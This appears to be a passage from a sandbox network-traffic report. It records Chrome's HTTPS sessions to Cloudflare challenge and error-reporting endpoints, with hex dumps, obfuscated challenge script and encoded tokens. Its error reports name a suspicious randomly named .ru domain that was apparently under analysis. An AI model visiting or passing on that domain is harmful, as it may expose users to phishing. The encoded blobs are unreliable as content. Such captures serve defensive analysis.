                                                                                                    2025-01-14 17:35:54 UTC1369INData Raw: 75 72 6e 20 69 52 3d 69 4e 2c 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 68 3d 3d 27 27 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 69 52 28 31 34 37 37 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 53 29 7b 72 65 74 75 72 6e 20 69 53 3d 69 52 2c 68 5b 69 53 28 31 32 30 31 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 54 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4f 2c 4c 2c 4d 2c 4e 29 7b 66 6f 72 28 69 54 3d 69 4e 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 64 5b 69 54 28 34 39 38 29 5d 28 6f 2c 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 64 5b 69 54 28 32 39 38 29 5d 28 33 2c 45 29 3b 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b
                                                                                                    Data Ascii: urn iR=iN,h==null?'':h==''?null:f.i(h[iR(1477)],32768,function(i,iS){return iS=iR,h[iS(1201)](i)})},'i':function(i,j,o,iT,s,x,B,C,D,E,F,G,H,I,J,K,O,L,M,N){for(iT=iN,s=[],x=4,B=4,C=3,D=[],G=d[iT(498)](o,0),H=j,I=1,E=0;d[iT(298)](3,E);s[E]=E,E+=1);for(J=0,K


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    18192.168.2.556430104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:54 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1228627879:1736874980:owDbRf1JMQLzSAAsYvB4RBCQLQ8PykMmZK59qzc4AFE/901f629158744368/WGOW0ZmnxUg9b29m4TdFJM.YSuViBt66WvIZB07wG0o-1736876152-1.1.1.1-EGtzERGKxVfB3AFLRIXjJCckMdBjWlaaS6RRvK9sK9rsGZSeX_ac15Nm8sKO58f3 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 3201
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                    CF-Chl-RetryAttempt: 0
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    CF-Challenge: WGOW0ZmnxUg9b29m4TdFJM.YSuViBt66WvIZB07wG0o-1736876152-1.1.1.1-EGtzERGKxVfB3AFLRIXjJCckMdBjWlaaS6RRvK9sK9rsGZSeX_ac15Nm8sKO58f3
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:54 UTC3201OUTData Raw: 76 5f 39 30 31 66 36 32 39 31 35 38 37 34 34 33 36 38 3d 7a 4a 45 30 61 30 44 30 4b 30 39 30 6b 43 57 47 43 57 59 30 43 33 55 35 6d 68 33 57 69 43 66 66 57 63 77 57 55 71 30 43 76 57 73 30 55 45 68 55 65 76 45 57 64 54 76 57 6c 31 43 36 7a 57 2d 30 43 59 45 57 55 6f 49 4a 79 70 57 6f 35 57 74 57 43 4a 57 6f 45 25 32 62 71 57 77 57 79 71 55 66 57 35 71 54 45 4a 57 4e 30 79 68 64 57 6a 64 54 6b 50 4f 30 73 67 67 41 57 6f 6a 49 57 69 30 54 4e 74 41 50 57 55 35 4c 4c 71 4e 51 56 72 64 41 4d 59 35 34 41 57 43 52 57 54 39 65 57 45 5a 52 77 6f 42 75 57 70 67 30 57 6a 31 57 68 77 39 45 41 4f 6b 48 5a 5a 46 68 5a 32 35 34 43 6f 76 38 77 44 35 57 64 5a 61 53 38 70 30 71 57 6f 31 6f 78 6f 59 71 54 6d 46 37 53 48 73 33 33 69 31 57 53 30 57 53 33 6b 4d 73 34 4b 57 57
                                                                                                    Data Ascii: v_901f629158744368=zJE0a0D0K090kCWGCWY0C3U5mh3WiCffWcwWUq0CvWs0UEhUevEWdTvWl1C6zW-0CYEWUoIJypWo5WtWCJWoE%2bqWwWyqUfW5qTEJWN0yhdWjdTkPO0sggAWojIWi0TNtAPWU5LLqNQVrdAMY54AWCRWT9eWEZRwoBuWpg0Wj1Whw9EAOkHZZFhZ254Cov8wD5WdZaS8p0qWo1oxoYqTmF7SHs33i1WS0WS3kMs4KWW
                                                                                                    2025-01-14 17:35:54 UTC751INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:35:54 GMT
                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                    Content-Length: 153088
                                                                                                    Connection: close
                                                                                                    cf-chl-gen: Tq3+CyHItFJWq+X6eHHidgIiy2Ejyroal6wlMBkgHGjWjctEwVsr4iQMJcCGUzpqHonLYLz31R2IpJLNr1Zuc/Ikjm1d8Xo5H0+sSV1S1GPRUpcU86hmv1kKhwOv64l5W+eVZ+gO+oV0m0n5IwyW1MGLwJfEtMGbjfq78Fe59fzVoxnQora/aL93kgIcZ2MgGbOovUTexzYNVq+/qgT1Nunf5y5Rlz4eJ+nQr8Frm4zbK/Zqr01ROrxYSMmDtEh+b8lmr9QxxAmqXl5GAi/l5LpkIP2dYI7+/tuiDYq0AS4zSQxMLnlpIR9dL2Opo1WT/9amyGA3fHZZR4oxorKkAXnFpfewGFcTnMxnlOvB36qA5552YX4FHhw8tyL2OTP68p3K8IbikjtwYoY5QbROgjD38aZN18jVgB2sBpFv/DyKSM7lLMtqPBhmTvv2OkhuP0HOKI00CufnUe/XJuYECSEqqeHRdfcE+9W85790cC0=$RGlbgttcuw0q2gSz6oXbKQ==
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f629c28ee438d-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:35:54 UTC618INData Raw: 6c 45 70 70 61 6b 2b 4c 59 6d 31 32 64 34 35 58 69 6c 74 64 66 4b 52 69 63 32 47 6b 6f 5a 61 42 6c 6e 32 74 6e 71 78 6f 61 6e 75 51 62 35 2b 6f 72 59 57 57 73 71 5a 34 6d 33 61 36 6b 35 43 36 6f 5a 4b 6d 72 72 65 63 6c 38 57 2f 78 4b 37 45 76 6f 72 49 78 38 65 6f 79 63 61 4f 72 39 47 71 32 38 58 56 31 38 7a 57 71 36 33 50 32 72 71 6a 30 73 65 6d 75 2b 75 34 34 36 76 42 32 38 58 4a 76 73 6e 4a 7a 63 44 6d 7a 4e 58 44 73 72 75 37 32 63 77 41 76 39 54 79 35 4f 50 47 33 66 34 49 42 2f 37 38 34 2b 55 42 37 65 6e 62 45 2f 44 4d 33 78 66 70 36 2f 67 51 44 76 55 53 38 75 6b 44 38 66 72 6a 38 76 4d 4a 46 77 6a 6f 39 43 51 58 4b 53 6b 61 36 78 48 73 38 53 51 56 42 67 63 6e 4b 7a 41 31 49 43 44 38 51 68 45 58 47 44 39 45 4e 79 67 35 52 45 70 4d 44 6b 4d 70 49 42 6f
                                                                                                    Data Ascii: lEppak+LYm12d45XiltdfKRic2GkoZaBln2tnqxoanuQb5+orYWWsqZ4m3a6k5C6oZKmrrecl8W/xK7EvorIx8eoycaOr9Gq28XV18zWq63P2rqj0semu+u446vB28XJvsnJzcDmzNXDsru72cwAv9Ty5OPG3f4IB/784+UB7enbE/DM3xfp6/gQDvUS8ukD8frj8vMJFwjo9CQXKSka6xHs8SQVBgcnKzA1ICD8QhEXGD9ENyg5REpMDkMpIBo
                                                                                                    2025-01-14 17:35:54 UTC1369INData Raw: 78 58 4d 6c 35 45 4d 55 56 5a 57 6c 78 44 50 32 59 6a 58 32 78 73 55 43 31 59 54 56 46 45 4f 30 64 58 63 48 46 37 56 33 42 7a 50 56 64 32 59 58 68 54 65 6e 6d 42 68 48 6d 4b 59 57 4e 4c 68 45 70 2b 62 59 32 55 62 6d 31 32 6d 57 6c 55 6e 48 46 61 6b 58 39 74 6e 70 69 58 59 6e 70 30 67 57 6d 64 69 35 65 62 6f 70 43 66 66 49 32 65 71 34 5a 34 75 62 6d 64 72 4c 43 53 74 4a 2b 41 65 6f 4f 6d 73 71 2b 42 75 71 53 64 6f 38 65 33 78 4d 47 77 7a 38 4c 4e 30 5a 54 4a 32 4e 43 72 70 72 43 73 70 39 75 77 30 72 36 74 31 4e 33 66 31 74 62 52 33 63 44 58 32 63 48 46 76 36 72 6c 34 61 37 30 7a 2b 54 50 39 71 7a 51 75 4f 33 2b 2b 37 6f 41 77 50 33 36 30 62 34 43 31 63 6a 47 42 39 72 68 44 67 33 6a 44 42 49 52 36 42 41 57 46 65 6b 55 47 68 6e 30 47 42 34 64 39 52 77 69 49
                                                                                                    Data Ascii: xXMl5EMUVZWlxDP2YjX2xsUC1YTVFEO0dXcHF7V3BzPVd2YXhTenmBhHmKYWNLhEp+bY2Ubm12mWlUnHFakX9tnpiXYnp0gWmdi5ebopCffI2eq4Z4ubmdrLCStJ+AeoOmsq+BuqSdo8e3xMGwz8LN0ZTJ2NCrprCsp9uw0r6t1N3f1tbR3cDX2cHFv6rl4a70z+TP9qzQuO3++7oAwP360b4C1cjGB9rhDg3jDBIR6BAWFekUGhn0GB4d9RwiI
                                                                                                    2025-01-14 17:35:54 UTC1369INData Raw: 6a 59 31 5a 64 57 30 68 41 4c 69 73 76 50 6e 64 6c 64 46 42 57 56 31 74 38 50 44 56 78 62 46 4a 39 66 59 46 77 58 55 5a 64 55 32 42 31 57 48 74 6c 65 57 57 52 6a 35 43 52 61 47 35 57 64 58 4f 4e 6b 58 68 5a 64 71 46 78 65 5a 69 65 6b 61 64 6d 70 71 61 4a 70 6f 70 66 6d 59 5a 6d 6a 5a 79 4a 72 49 32 55 6a 59 74 30 6c 4a 43 51 73 36 61 57 6a 5a 47 71 6d 70 4b 56 72 70 36 58 79 49 58 47 78 36 47 4a 72 4d 32 6e 6b 4c 4f 50 6e 35 62 43 70 39 47 57 72 70 6a 59 74 4c 71 64 6f 64 2f 43 75 73 44 52 6e 61 4b 66 74 74 6e 73 77 4e 7a 44 75 62 76 75 77 73 2f 79 35 66 58 44 31 72 6a 35 35 62 32 36 79 37 66 36 33 51 4b 36 33 4d 62 35 39 75 6e 59 41 77 77 4f 2b 64 6b 52 41 65 66 6f 36 51 2f 6a 34 75 6f 61 45 74 54 30 43 76 34 66 49 67 33 63 46 77 41 55 39 52 66 6b 46 2b
                                                                                                    Data Ascii: jY1ZdW0hALisvPndldFBWV1t8PDVxbFJ9fYFwXUZdU2B1WHtleWWRj5CRaG5WdXONkXhZdqFxeZiekadmpqaJpopfmYZmjZyJrI2UjYt0lJCQs6aWjZGqmpKVrp6XyIXGx6GJrM2nkLOPn5bCp9GWrpjYtLqdod/CusDRnaKfttnswNzDubvuws/y5fXD1rj55b26y7f63QK63Mb59unYAwwO+dkRAefo6Q/j4uoaEtT0Cv4fIg3cFwAU9RfkF+
                                                                                                    2025-01-14 17:35:54 UTC1369INData Raw: 4c 6d 35 46 53 58 56 30 55 48 4e 35 65 46 46 33 66 58 75 42 64 54 39 41 50 33 73 38 67 6d 46 58 5a 48 5a 6a 65 30 52 6c 67 35 46 4f 69 6d 57 50 55 32 2b 58 59 55 78 59 5a 56 69 63 58 34 39 78 57 5a 75 54 6d 32 57 6b 6c 6d 53 46 67 35 56 37 67 34 4a 38 66 61 2b 4c 63 4b 78 77 6f 48 65 36 67 36 57 4c 6e 5a 53 57 75 49 47 65 74 61 53 5a 6e 38 48 48 70 5a 69 43 77 71 69 4f 6c 34 65 5a 68 4c 2b 50 70 70 36 50 77 72 69 79 73 36 58 49 76 4a 37 59 76 72 6a 6b 33 37 53 2f 70 73 44 42 6f 73 4f 32 76 72 6a 59 76 38 36 79 38 38 57 74 39 2f 66 6d 32 75 37 79 74 76 48 31 75 4f 6e 35 32 4d 44 36 34 4d 57 2b 77 4e 47 38 39 38 66 39 7a 75 58 75 43 66 44 6f 36 67 37 74 39 41 76 36 42 4e 76 53 44 76 50 70 44 42 6b 41 44 76 54 62 33 2f 34 6f 38 79 73 70 39 43 7a 73 4b 69 77
                                                                                                    Data Ascii: Lm5FSXV0UHN5eFF3fXuBdT9AP3s8gmFXZHZje0Rlg5FOimWPU2+XYUxYZVicX49xWZuTm2WklmSFg5V7g4J8fa+LcKxwoHe6g6WLnZSWuIGetaSZn8HHpZiCwqiOl4eZhL+Ppp6Pwriys6XIvJ7Yvrjk37S/psDBosO2vrjYv86y88Wt9/fm2u7ytvH1uOn52MD64MW+wNG898f9zuXuCfDo6g7t9Av6BNvSDvPpDBkADvTb3/4o8ysp9CzsKiw
                                                                                                    2025-01-14 17:35:54 UTC1369INData Raw: 30 45 73 5a 7a 64 4f 52 6a 64 71 58 58 52 31 54 58 42 6b 52 6f 42 6d 59 49 78 38 61 33 31 4f 61 47 6c 4b 61 31 35 6d 59 49 42 6e 64 6c 71 62 62 56 57 66 6e 34 36 43 6c 70 70 65 6f 5a 32 50 6c 5a 79 6d 6f 36 4b 49 62 57 5a 6f 65 57 53 66 62 36 56 32 6a 5a 61 77 6d 4a 43 53 74 5a 57 63 73 71 6d 2f 77 6e 71 31 6d 35 47 7a 77 4b 65 31 6e 49 4f 48 70 73 2b 62 30 74 43 63 30 35 54 52 30 36 2b 4d 6d 5a 57 59 6d 4e 79 37 6d 4b 4c 65 34 37 76 53 30 62 2b 78 70 4c 2f 57 32 64 62 46 70 71 6a 47 79 73 62 6f 73 63 44 58 35 65 33 49 7a 66 6e 48 33 38 41 42 75 2f 37 6c 38 73 58 44 35 63 6b 4c 78 64 6a 6f 41 67 37 69 33 65 6e 54 31 4e 37 78 36 2b 63 4f 35 76 62 78 37 4f 66 79 49 69 44 39 41 79 45 65 49 67 4d 6a 35 42 7a 33 47 75 63 41 2b 69 6f 47 47 2f 77 71 43 77 6b 57
                                                                                                    Data Ascii: 0EsZzdORjdqXXR1TXBkRoBmYIx8a31OaGlKa15mYIBndlqbbVWfn46ClppeoZ2PlZymo6KIbWZoeWSfb6V2jZawmJCStZWcsqm/wnq1m5GzwKe1nIOHps+b0tCc05TR06+MmZWYmNy7mKLe47vS0b+xpL/W2dbFpqjGysboscDX5e3IzfnH38ABu/7l8sXD5ckLxdjoAg7i3enT1N7x6+cO5vbx7OfyIiD9AyEeIgMj5Bz3GucA+ioGG/wqCwkW
                                                                                                    2025-01-14 17:35:54 UTC1369INData Raw: 4a 77 64 33 4a 61 50 58 4a 50 66 46 78 71 66 32 6c 68 66 45 36 4d 6a 57 6c 50 58 59 31 53 55 48 56 6a 62 31 65 44 64 33 75 63 6e 4b 47 56 57 61 47 6c 63 32 57 62 71 58 64 71 64 61 31 37 62 57 69 78 66 33 43 4a 6e 61 36 76 70 36 6c 72 63 6f 65 64 6a 6e 56 78 69 34 42 37 66 4b 33 46 74 62 75 6a 79 4a 4f 59 6c 36 44 49 6e 4d 48 43 68 4a 2f 46 72 38 36 6c 79 64 6d 4d 6f 39 61 79 33 39 6d 64 74 37 36 72 6d 71 2b 6a 7a 38 62 65 36 2b 7a 6a 35 2b 72 43 79 4d 44 65 38 2b 48 6e 38 63 44 6e 31 73 6a 59 39 50 66 4f 34 50 76 74 30 39 58 73 42 74 50 2b 2f 4f 72 6e 76 63 4d 4f 33 4d 6b 53 79 4f 54 66 43 4e 55 4e 42 76 6b 4b 36 74 54 5a 44 39 33 30 46 50 59 52 41 42 51 51 49 78 66 69 35 51 48 72 42 51 4d 5a 4b 43 63 71 36 79 38 53 37 44 49 56 43 41 30 38 4b 78 4d 33 2b
                                                                                                    Data Ascii: Jwd3JaPXJPfFxqf2lhfE6MjWlPXY1SUHVjb1eDd3ucnKGVWaGlc2WbqXdqda17bWixf3CJna6vp6lrcoedjnVxi4B7fK3FtbujyJOYl6DInMHChJ/Fr86lydmMo9ay39mdt76rmq+jz8be6+zj5+rCyMDe8+Hn8cDn1sjY9PfO4Pvt09XsBtP+/OrnvcMO3MkSyOTfCNUNBvkK6tTZD930FPYRABQQIxfi5QHrBQMZKCcq6y8S7DIVCA08KxM3+
                                                                                                    2025-01-14 17:35:54 UTC1369INData Raw: 44 68 32 4a 47 61 33 65 48 67 32 42 65 66 6b 69 4e 59 58 4b 4b 6b 55 6c 79 6a 57 78 35 6c 70 42 62 65 5a 6d 56 64 4a 69 53 6d 47 4f 54 6d 36 47 69 65 71 68 6c 6d 5a 69 4f 61 61 32 63 6b 6d 32 78 6f 4a 5a 78 74 61 53 61 64 62 6d 6f 6e 6e 6d 39 72 4b 4a 39 77 62 43 6d 67 63 57 30 74 34 65 35 69 62 75 4c 76 59 32 2f 6a 38 47 52 77 35 50 46 6c 63 65 62 73 35 6e 4c 6e 74 33 43 33 70 2f 68 6f 65 4f 6a 70 39 2f 66 34 63 44 46 36 2b 72 49 35 38 37 74 73 75 44 6d 73 4f 58 6a 32 76 4c 31 39 50 58 30 2b 66 54 65 2b 73 50 33 41 76 33 63 33 66 73 43 35 4e 72 77 42 51 72 52 43 51 6e 54 46 42 45 54 41 2b 34 52 45 64 76 59 47 52 58 30 38 51 58 66 34 76 6b 4a 49 52 4d 73 44 43 55 42 4c 42 45 71 48 2f 30 73 4c 52 67 4b 47 54 4d 63 2b 54 6e 31 4b 30 45 65 2b 53 38 39 4a 51
                                                                                                    Data Ascii: Dh2JGa3eHg2BefkiNYXKKkUlyjWx5lpBbeZmVdJiSmGOTm6GieqhlmZiOaa2ckm2xoJZxtaSadbmonnm9rKJ9wbCmgcW0t4e5ibuLvY2/j8GRw5PFlcebs5nLnt3C3p/hoeOjp9/f4cDF6+rI587tsuDmsOXj2vL19PX0+fTe+sP3Av3c3fsC5NrwBQrRCQnTFBETA+4REdvYGRX08QXf4vkJIRMsDCUBLBEqH/0sLRgKGTMc+Tn1K0Ee+S89JQ
                                                                                                    2025-01-14 17:35:54 UTC1369INData Raw: 53 33 70 33 61 6f 56 6b 63 59 36 49 55 34 2b 4c 69 35 4a 71 5a 46 75 5a 66 6e 35 5a 6a 71 52 39 6d 4a 31 6c 6f 32 4e 63 6e 36 4f 67 59 4b 4f 4b 70 59 53 52 72 71 68 7a 6b 62 47 74 6a 4c 43 71 73 4c 61 4e 6f 4c 52 2b 71 37 4f 38 67 70 6e 44 76 4a 79 61 79 49 57 35 77 4c 79 4c 76 62 75 79 79 74 4b 52 7a 4d 76 52 79 38 2f 57 72 38 76 59 32 4d 4f 31 30 2b 4f 38 70 63 57 68 35 63 72 6d 70 4d 2f 58 33 4b 2f 64 71 65 76 74 71 4f 76 53 37 63 7a 5a 39 76 43 37 32 66 6e 31 31 50 6a 79 2b 50 37 56 36 50 7a 47 38 2f 73 46 79 75 45 4d 42 65 54 69 45 63 30 43 43 51 58 54 42 67 54 36 45 78 76 5a 46 52 51 61 46 42 67 66 39 78 51 68 49 51 7a 39 48 43 77 46 37 51 37 70 4c 68 4d 76 37 42 67 67 4a 66 63 6d 37 52 63 79 45 52 34 37 4e 51 41 65 50 6a 6f 5a 50 54 63 39 51 78 6f
                                                                                                    Data Ascii: S3p3aoVkcY6IU4+Li5JqZFuZfn5ZjqR9mJ1lo2Ncn6OgYKOKpYSRrqhzkbGtjLCqsLaNoLR+q7O8gpnDvJyayIW5wLyLvbuyytKRzMvRy8/Wr8vY2MO10+O8pcWh5crmpM/X3K/dqevtqOvS7czZ9vC72fn11Pjy+P7V6PzG8/sFyuEMBeTiEc0CCQXTBgT6ExvZFRQaFBgf9xQhIQz9HCwF7Q7pLhMv7BggJfcm7RcyER47NQAePjoZPTc9Qxo
                                                                                                    2025-01-14 17:35:54 UTC1369INData Raw: 32 36 4f 66 70 4f 53 55 32 75 48 65 35 42 51 68 35 6d 5a 58 36 43 4d 59 6d 4b 54 6c 36 47 69 65 61 47 66 71 62 43 59 62 6d 2b 46 72 36 69 4c 75 4b 43 76 73 6e 53 59 65 62 5a 34 73 48 71 6a 71 36 52 2f 77 63 69 77 76 38 4b 5a 70 73 53 32 69 4d 6a 45 6b 74 53 38 79 4a 4b 6c 7a 39 48 43 75 62 7a 53 79 64 2f 51 31 39 71 31 31 4b 48 64 30 38 66 63 70 74 6a 55 71 71 72 62 79 65 6e 61 35 2b 66 70 78 37 48 69 73 76 62 33 37 50 50 66 30 66 50 36 36 76 76 6a 76 39 73 42 41 67 41 44 78 4f 6a 48 34 77 67 42 43 2f 50 75 43 51 2f 2b 36 76 6b 4e 45 67 30 49 31 2f 4d 59 2f 68 62 30 49 42 59 61 2b 50 55 49 48 64 77 55 4a 43 55 51 37 52 4c 70 48 68 30 54 38 53 34 53 4c 44 49 79 43 69 7a 32 4b 68 4d 73 2b 78 67 39 50 6a 6b 2b 4f 45 4a 41 42 7a 77 38 51 51 73 39 4f 77 74 50
                                                                                                    Data Ascii: 26OfpOSU2uHe5BQh5mZX6CMYmKTl6GieaGfqbCYbm+Fr6iLuKCvsnSYebZ4sHqjq6R/wciwv8KZpsS2iMjEktS8yJKlz9HCubzSyd/Q19q11KHd08fcptjUqqrbyena5+fpx7Hisvb37PPf0fP66vvjv9sBAgADxOjH4wgBC/PuCQ/+6vkNEg0I1/MY/hb0IBYa+PUIHdwUJCUQ7RLpHh0T8S4SLDIyCiz2KhMs+xg9Pjk+OEJABzw8QQs9OwtP


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    19192.168.2.55643135.190.80.14437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:54 UTC543OUTOPTIONS /report/v4?s=ag3ws%2FF985H0zq9wg89%2Fkx5rND%2BlmktGl1PoKGTjJVe9%2FjUG4%2BOgsWS%2BPyAHI6phcId9L%2FSqpY0ymK60ZKyqePHZXQkiFqkyLpiZaHl0E1BFhmlev3DiI56lsBqMIQ%3D%3D HTTP/1.1
                                                                                                    Host: a.nel.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Origin: https://l4u8.yaalwgyl.ru
                                                                                                    Access-Control-Request-Method: POST
                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:54 UTC336INHTTP/1.1 200 OK
                                                                                                    Content-Length: 0
                                                                                                    access-control-max-age: 86400
                                                                                                    access-control-allow-methods: POST, OPTIONS
                                                                                                    access-control-allow-origin: *
                                                                                                    access-control-allow-headers: content-length, content-type
                                                                                                    date: Tue, 14 Jan 2025 17:35:54 GMT
                                                                                                    Via: 1.1 google
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    20192.168.2.55643735.190.80.14437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:55 UTC484OUTPOST /report/v4?s=ag3ws%2FF985H0zq9wg89%2Fkx5rND%2BlmktGl1PoKGTjJVe9%2FjUG4%2BOgsWS%2BPyAHI6phcId9L%2FSqpY0ymK60ZKyqePHZXQkiFqkyLpiZaHl0E1BFhmlev3DiI56lsBqMIQ%3D%3D HTTP/1.1
                                                                                                    Host: a.nel.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 430
                                                                                                    Content-Type: application/reports+json
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:55 UTC430OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 37 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 34 75 38 2e 79 61 61 6c 77 67 79 6c 2e 72 75 2f 56 44 62 30 70 75 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 38 36 2e 31 36 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                                                                    Data Ascii: [{"age":0,"body":{"elapsed_time":473,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://l4u8.yaalwgyl.ru/VDb0pu/","sampling_fraction":1.0,"server_ip":"172.67.186.162","status_code":404,"type":"http.error"},"type":"network-error
                                                                                                    2025-01-14 17:35:55 UTC168INHTTP/1.1 200 OK
                                                                                                    Content-Length: 0
                                                                                                    date: Tue, 14 Jan 2025 17:35:54 GMT
                                                                                                    Via: 1.1 google
                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                    Connection: close


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    21192.168.2.556438104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:55 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1228627879:1736874980:owDbRf1JMQLzSAAsYvB4RBCQLQ8PykMmZK59qzc4AFE/901f629158744368/WGOW0ZmnxUg9b29m4TdFJM.YSuViBt66WvIZB07wG0o-1736876152-1.1.1.1-EGtzERGKxVfB3AFLRIXjJCckMdBjWlaaS6RRvK9sK9rsGZSeX_ac15Nm8sKO58f3 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:35:55 UTC442INHTTP/1.1 400 Bad Request
                                                                                                    Date: Tue, 14 Jan 2025 17:35:55 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 14
                                                                                                    Connection: close
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    cf-chl-out: IspnUyiWY0l+m2qNbwkhyvVHnrMiItgMEYIcRWJ6SDr1VVJ9AhNI3sFGJLalX6RGY/c53eNTPbgAfeyTuDzrrw==$6LczWtYoybXTT+kKoxvfKg==
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f62a2ee3f41d3-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:35:55 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                                                    Data Ascii: {"err":100230}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    22192.168.2.556439104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:35:55 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/901f629158744368/1736876154281/IuOmzKH2y67OPFE HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
